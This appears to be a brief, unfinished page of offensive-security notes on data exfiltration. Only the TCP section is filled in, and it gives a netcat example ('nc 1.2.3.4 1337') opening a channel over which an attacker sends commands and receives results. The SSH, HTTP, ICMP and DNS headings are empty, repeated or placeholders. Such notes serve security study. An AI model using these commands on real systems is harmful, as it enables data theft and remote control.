☣️Data Exfiltration
Data exfil via TCP

The first machine is listening over TCP on port 1337
The other machine connects to the port specified in step 1. For example, nc 1.2.3.4 1337
The first machine establishes the connection
Finally, the sending and receiving data starts. For example, the attacker sends commands and receives results.
This is easy to detect for IDS and network sniffers, as well as XDR.
Data exfil via SSH
Data exfil via SSH
Data exfil via HTTP
Data exfil via ICMP

Data exfil via DNS and DNS Tunneling
--placeholder--
Last updated
